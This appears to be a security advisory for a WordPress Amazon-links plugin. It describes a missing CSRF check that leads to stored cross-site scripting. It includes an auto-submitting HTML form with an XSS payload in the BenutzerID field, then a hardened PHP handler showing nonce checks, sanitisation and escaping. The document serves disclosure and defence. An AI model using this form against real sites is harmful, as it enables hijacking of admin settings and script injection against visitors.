The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack. Because the settings are neither sanitised nor escaped, this can lead to Stored Cross-Site Scripting.
<form id="test" action="https://example.com/wp-admin/options-general.php?page=amazon-einzeltitellinks.php" method="POST">
<input type="text" name="BenutzerID" value='hacked"><img src onerror=alert(/XSS/)>'>
<input type="text" name="amazon_einzeltitel_links_name" value="">
<input type="text" name="amazon_einzeltitel_rechts_name" value="">
<input type="text" name="amazon_einzeltitel_none_name" value="">
<input type="text" name="amazon_einzeltitel_link_name" value="">
<input type="text" name="amazon_einzeltitel_rahmen_name" value="">
<input type="text" name="amazon_einzeltitel_titelfarbe_name" value="">
<input type="text" name="amazon_einzeltitel_preisfarbe_name" value="">
<input type="text" name="amazon_einzeltitel_hintergrundfarbe_name" value="">
<input type="text" name="amazonUpdate" value="Speichern">
</form>
<script>
document.getElementById("test").submit();
</script>
Daniel Ruf
Daniel Ruf
Yes
2022-05-30 (about 11 months ago)
2022-05-30 (about 11 months ago)
2023-02-25 (about 2 months ago)
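A settings handler that would reject the cross-site form above and neutralise the injected markup, shown as an added example and not the plugin's own code. The function name `aetl_render_settings_page`, the nonce action `aetl_save_settings`, the nonce field `aetl_nonce` and the option key `aetl_benutzer_id` are hypothetical; only the `BenutzerID` and `amazonUpdate` field names come from the proof of concept.

```php
<?php
// Added example (hypothetical names, not the plugin's code): settings page
// callback with a capability check, a nonce check, input sanitisation and
// output escaping.

function aetl_render_settings_page() {
    // Only administrators may view or change the settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }

    if ( isset( $_POST['amazonUpdate'] ) ) {
        // CSRF check: terminates the request unless it carries a valid nonce
        // issued for this action to the current admin session. A form hosted
        // on another origin cannot supply that value.
        check_admin_referer( 'aetl_save_settings', 'aetl_nonce' );

        // Sanitise on input: remove slashes added by WordPress, then strip
        // tags, control characters and extra whitespace.
        $benutzer_id = isset( $_POST['BenutzerID'] )
            ? sanitize_text_field( wp_unslash( $_POST['BenutzerID'] ) )
            : '';
        update_option( 'aetl_benutzer_id', $benutzer_id ); // assumed option key
    }

    $benutzer_id = get_option( 'aetl_benutzer_id', '' );
    ?>
    <form method="post">
        <?php
        // Emits the hidden nonce field that check_admin_referer() verifies.
        wp_nonce_field( 'aetl_save_settings', 'aetl_nonce' );
        ?>
        <!-- Escape on output: esc_attr() encodes quotes and angle brackets,
             so a stored value cannot break out of the attribute. -->
        <input type="text" name="BenutzerID"
               value="<?php echo esc_attr( $benutzer_id ); ?>">
        <input type="submit" name="amazonUpdate" value="Speichern">
    </form>
    <?php
}
```

The same sanitise-on-save and escape-on-output pattern would apply to each of the other settings fields the form submits.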